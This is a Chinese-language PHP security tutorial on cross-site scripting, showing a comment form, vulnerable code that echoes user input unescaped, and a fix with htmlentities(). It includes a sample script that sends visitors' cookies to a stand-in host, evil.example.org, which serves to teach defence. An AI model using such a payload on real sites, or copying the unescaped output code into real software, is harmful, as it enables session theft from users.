PHP安全-跨站指令碼攻擊

跨站指令碼攻擊

跨站指令碼攻擊是眾所周知的攻擊方式之一。所有平台上的Web應用都深受其擾，PHP應用也不例外。

所有有輸入的應用都面臨著風險。Webmail，論壇，留言本，甚至是Blog。事實上，大多數Web應用提供輸入是出於更吸引人氣的目的，但同時這也會把自己置於危險之中。如果輸入沒有正確地進行過濾和轉義，跨站指令碼漏洞就產生了。

以一個允許在每個頁面上錄入評論的應用為例，它使用了下面的表單協助使用者進行提交：

CODE:

<form action="comment.php" method="POST"/>  <p>Name: <input type="text" name="name"/><br />  Comment: <textarea name="comment" rows="10"cols="60"></textarea><br />  <input type="submit" value="Add Comment"/></p>  </form>

程式向其他訪問該頁面的使用者顯示評論。例如，類似下面的程式碼片段可能被用來輸出一個評論($comment)及與之對應的發表人（$name）：

CODE:

<?php   echo "<p>$name writes:<br />";  echo"<blockquote>$comment</blockquote></p>";   ?>

這個流程對$comment及$name的值給予了充分的信任，想象一下它們中的一個的內容中包含如下代碼：

CODE:

<script>  document.location =    'http://evil.example.org/steal.php?cookies='+    document.cookie  </script>

如果你的使用者察看這個評論時，這與你允許別人在你的網站來源程式中加入Javascript代碼無異。你的使用者會在不知不覺中把他們的cookies(瀏覽網站的人)發送到evil.example.org，而接收程式(steal.php)可以通過$_GET['cookies']變數防問所有的cookies。

這是一個常見的錯誤，主要是由於不好的編程習慣引發的。幸運的是此類錯誤很容易避免。由於這種風險只在你輸出了被汙染資料時發生，所以只要確保做到如第一章所述的過濾輸入及轉義輸出即可

最起碼你要用htmlentities()對任何你要輸出到用戶端的資料進行轉義。該函數可以把所有的特殊字元轉換成HTML表示方式。所有會引起瀏覽器進行特殊處理的字元在進行了轉換後，就能確保顯示出來的是原來錄入的內容。

由此，用下面的代碼來顯示評論是更安全的：

CODE:

<?php   $clean = array();  $html = array();   /* Filter Input ($name, $comment) */   $html['name'] = htmlentities($clean['name'],ENT_QUOTES, 'UTF-8');  $html['comment'] = htmlentities($clean['comment'],ENT_QUOTES, 'UTF-8');   echo "<p>{$html['name']} writes:<br/>";  echo"<blockquote>{$html['comment']}</blockquote></p>";   ?>

以上就是PHP安全-跨站指令碼攻擊的內容，更多相關內容請關注topic.alibabacloud.com（www.php.cn）！

